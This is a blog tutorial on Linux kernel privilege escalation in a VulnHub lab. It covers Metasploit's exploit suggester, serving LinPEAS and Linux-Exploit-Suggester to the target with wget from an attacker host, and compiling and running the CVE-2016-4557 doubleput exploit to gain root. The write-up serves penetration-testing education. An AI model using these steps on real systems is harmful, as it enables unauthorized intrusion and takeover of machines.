Linux PrivEsc(1) — Linux Kernel Exploits
This is the first of my Linux Privilege Escalation series. Here, you’ll learn about how to identify and utilize kernel exploits on Linux manually and automatically. We will start by looking at how to identify Linux kernel vulnerabilities by the use of local enumeration scripts. Then we look at how we can modify and transfer kernel exploits to the target system after that. You can read the second in series here: Linux-Scheduled Tasks
This module covers the following two topics:
• Kernel exploitation with Metasploit
• Manual kernel exploitation
The Linux Kernel
The Linux Kernel consists of two main modes of operation which determines the access to system resources and hardware:
• User space: This is a no-privilege reserved memory sector for user programs and services that runs outside the system kernel. These services are separated from the kernel and by default would have low privileges.
• Kernel space: This is the privileged memory sector where the kernel runs.
User Space applications communicate with the Kernel space through the use of System calls as shown above. This interaction is facilitated through the GNU C libraries and the system call interface.
The kernel Space has access to the hardware and resources responsible for managing system services and system calls from the user space.
Given that the kernel runs in the privileged kernel space, any vulnerability in the kernel that allows us to run arbitrary code in a privileged state will end in providing us with an elevated session.
Prerequisite
- Kali Linux as the attacker machine
- Target is Stapler virtual machine. You can download it from vulnhub.
- Initial bash shell on the target / standard meterpreter shell on target.
Linux Kernel Exploit with Metasploit
( I already have a bash shell foothold on the target through a netcat listener. Follow this walkthrough to get foothold on stapler.)
In order to get a meterpreter session from this shell session:
On the attacker’s machine, Generate a simple elf Linux meterpreter payload.
Serve it up to be downloaded unto the target machine.
Set up a listener with the same payload settings
On the target machine, download the served payload with the wget tool
Make the payload executable and Launch it on the victim machine
You catch a meterpreter session in your metasploit listener
Privilege Escalation
I’m gonna start with the go-to exploit module to use after gaining foothold on any system. The Local Exploit Suggester. This module suggests local meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter.
Set the session to the lower privileged meterpreter session you already have.
Run and Wait
Now, we test the modules suggested. There’s high probability of the first two modules working successfully. Here, I’m going to try the second listed module in the screenshot above.
Let’s read a bit about the payload to see what it does. After typing ‘info’, this is the description we got about the module.
This kernel exploit will exploit a netfilter bug on Linux kernels before version 4.6.3 and requires iptables to be enabled and loaded. The exploit also requires libc6-dev-i386 for compiling the exploit. More about it here
Let’s set up the module options
Now run
Our exploit wasn’t successful because libc6-dev-i386 and gcc-multilib isn’t installed on the target machine. (Now you can go ahead to install them on the target, then run the exploit again, it should work). I think this serves as a great lesson to us all, in a sense that we can’t always rely on automated modules to get the work done for us. Trial and error is only part of the privilege escalation.
Since this path yielded no results, let’s take a more manual approach to identify some kernel vulnerabilities and their respective exploits to use. In the next session, we’ll look at how to enumerate relevant kernel information from the target system with numerous enumeration tools.
Manual Kernel Exploitation
In some cases, you won’t have a meterpreter shell with metasploit modules available to elevate your privileges. Instead, you might have gained foothold via other manual means such as through web shells. Maybe you caught a bash shell in a netcat listener or ssh. This raises some issues; How can you scan the target to identify kernel vulnerabilities and exploits you can use to leverage them? And how can you transfer the exploits to the target?
In my case, I caught a shell via ssh
Local enumeration Tools
First thing to do after access is to identify the Linux vulnerabilities. I’ll be using the LinPEAS script to enumerate information about the target. It can be cloned from the github repo LinPEAS-Github.
Now to get this script to the target machine, host it on a server. And download it to the target. From the attacker’s machine(in the linPEAS directory), I’m going to use the temporary python server to serve this script to the target.
python -m SimpleHTTPServer
Now on the target’s machine(my ssh session), navigate to a directory where regardless of the type of user you are, you will have Read and Write permissions. This is the /tmp directory.
cd /tmp/In there, I’m going to use the wget tool to download the linPEAS script being served on the attacker’s machine.
wget http://<attacker-IP:8000>/linpeas.sh
Enumerating System Information
Before we execute the script, let’s check the permissions of the linpeas.sh script.
It is obvious we can only Read and Write to the script file. There’s no ‘x’ meaning we can’t execute the script. An attempt to execute the script throws an error:
On the target machine, modify the linpeas.sh script to be executeable. Add the ‘executable’ permission to the script with the chmod command:
chmod +x linpeas.sh
Let’s check the permissions again to see what changed:
Now it’s clear we now have executable permissions.
Running ./linpeas.sh will output all system information. However, we want to limit the script results to system information only. So we add the SysI tag to the command. This is because linpeas returns a large output so this tag is there to restrict the output to a specific category of information.
./linpeas.sh -o SysI
Scrolling through, we see system information and under that, we have information about the OS. It enumerates information about Linux version, Release version and as well as the codename.
Armed with this information, we can google exploits related to Ubuntu version 5.3.2–14ubuntu2, Linux version 4.4.0–21-generic, release version 16.04 as well as with codename xenial.
Using searchsploit on the attacker’s machine to see the local exploits we have in our arsenal.
Searchsploit is an offline version of exploit-db.com with the exploits stored locally on your kali machine.
Scrolling to the Exploit suggester part of the linpeas output, we see it even suggested some exploits from exploit-db we can download and run against the target. Some even correspond to the results searchsploit gave us.
You can download these scripts, compile them and run them on the target to elevate your privileges. I’m gonna hold up on that and go ahead to show you other tools we can use to enumerate critical system information.
Enumerating Kernel Exploits
We can use the Linux-Exploit-Suggester tool to enumerate system information and scan for potential exploits. The LinES script can be cloned from here: LinES-Github.
It is recommended you download the script and rename it to something else as the name’s quite long. Now serve the script:
python -m SimpleHTTPServer
On the target machine, use the wget tool to download the served script.
Change the modification of the linES.sh to be executable and launch it.
From the output, we can see some exploits the target system is vulnerable to. Some with high probability of working, others not so much. Now go through the results and pick the exploits that match your target’s system information. Here are two exploits that match the system info of my target.
It is always recommended to use the first exploit’s output with the enumeration tools and scripts. In this case, we will start with the CVE-2016–4557 kernel exploit.
You start by googling the CVE, learn as much as you can about the exploit. Read, watch videos on it’s usage. Understand it’s process and usage before going ahead to run it against your target.
Per the exploit Readme file, there is an exploit.jar file that contains two files (compile.sh and doubleput.sh) which when ran, would produce a root shell.
In our case we download the exploit zip via link: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/39772.zip
Now serve that on a python server:
and download it unto the target system:
Unzipping this file, we see the exploit.tar file
Extracting the exploit.tar file, we see a directory.
Change into that directory. In it contains the two files the exploit Readme talked about.
Run the compile.sh. This script will generate an exploit binary named doubleput.
./compile.sh(ignore the error message, as long as the doubleput binary is created, we’re good to go)
The doubleput binary is created
As per the exploit execution instructions, we can run the doubleput binary to obtain an elevated session.
./doubleput
With that, we have been able to successfully elevate our privileges on the target Linux VM by leveraging vulnerabilities in the Linux kernel.
I hope you learnt as lot from this. You can reach out to me on Twitter @tinopreter Follow me for more cybersecurity related content while you’re at it.
